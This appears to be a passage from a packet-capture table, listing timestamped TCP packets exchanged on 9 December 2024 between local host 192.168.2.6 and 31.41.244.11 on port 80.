                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.159801006 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.159847021 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.160572052 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.160583973 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.160617113 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.160633087 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.161458015 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.161501884 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.161623955 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.161669970 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.162329912 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.162344933 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.162384987 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.163310051 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.163356066 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.163567066 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.163614988 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.164016962 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.164083004 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.164108038 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.164150953 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.164992094 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.165034056 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.165040970 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.165072918 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.165781021 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.165838003 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.165939093 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.165986061 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.166688919 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.166724920 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.166733980 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.166758060 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.167542934 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.167594910 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.167745113 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.167792082 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.168412924 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.168459892 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.168514967 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.168560028 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.169300079 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.169346094 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.169362068 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.169409990 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.170126915 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.170171022 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.170211077 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.170258999 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.170988083 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.171036959 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.171055079 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.171101093 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.173315048 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.173367977 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.173386097 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.173429012 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.173599958 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.173610926 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.173644066 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.173661947 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.319905043 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.319998980 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.320004940 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.320056915 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.320168972 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.320179939 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.320213079 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.320235968 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.320990086 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.321039915 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.321124077 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.321171999 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.321852922 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.321901083 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.321938038 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.321985960 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.322506905 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.322535038 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.322560072 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.322577953 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.323352098 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.323400021 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.323476076 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.323525906 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.324243069 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.324289083 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.324362040 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.324409008 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.325124979 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.325180054 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.325267076 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.325313091 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.326047897 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.326061964 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.326097012 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.326864004 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.326942921 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.326955080 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.326984882 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.327675104 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.327722073 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.327748060 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.327794075 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.328582048 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.328628063 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.328656912 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.328723907 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.329432964 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.329498053 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.329566002 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.329611063 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.330274105 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.330355883 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.330437899 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.330486059 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.331157923 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.331206083 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.331212997 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.331262112 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.332093000 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.332143068 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.332253933 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.332302094 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.332922935 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.332972050 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.333000898 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.333045006 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.333777905 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.333823919 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.334026098 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.334070921 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.334690094 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.334711075 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.334738016 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.334748030 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.335495949 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.335541964 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.335834026 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.335901976 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.336379051 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.336426973 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.336484909 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.336533070 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.337213039 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.337260962 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.337277889 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.337317944 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.338129997 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.338162899 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.338180065 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.338203907 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.339045048 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.339090109 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.339113951 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.339158058 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.339848042 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.339895010 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.339989901 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.340039968 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.340719938 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.340766907 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.340862989 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.340907097 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.341604948 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.341651917 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.341718912 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.341763973 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.342518091 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.342564106 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.342576027 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.342622042 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.343338966 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.343386889 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.343417883 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.343466043 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.344249964 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.344301939 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.344319105 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.344368935 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.356661081 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.356672049 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.356736898 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357017040 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357033968 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357049942 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357059956 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357072115 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357083082 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357110023 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357136011 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357500076 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357511044 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357531071 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357541084 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357554913 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357561111 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357572079 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357580900 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357599020 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.357628107 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358021021 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358031034 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358072996 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358109951 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358122110 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358150959 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358161926 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358175039 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358186007 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358186007 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358205080 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358211040 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358216047 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358232975 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358243942 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358273983 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358985901 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.358998060 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.359016895 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.359028101 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.359038115 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.359051943 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.359066963 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.359091997 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.359446049 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.359457016 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.359476089 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.359488010 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.359500885 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.359513998 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.359543085 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.359858036 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.359906912 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.359970093 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.359981060 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.360018969 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.360713959 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.360763073 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.360780954 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.360829115 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.361581087 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.361629963 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.361690998 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.361742020 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.362472057 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.362520933 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.362646103 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.362694025 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.363320112 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.363369942 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.363404036 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.363465071 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.364160061 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.364211082 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.364341021 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.364386082 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.365068913 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.365107059 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.365114927 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.365148067 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.512356997 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.512624979 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.512698889 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.512718916 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.512761116 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.512783051 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.512825012 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.513632059 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.513761997 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.513811111 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.514444113 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.514498949 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.514715910 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.514856100 CET4987480192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.514978886 CET804987431.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:19.515018940 CET4987480192.168.2.631.41.244.11
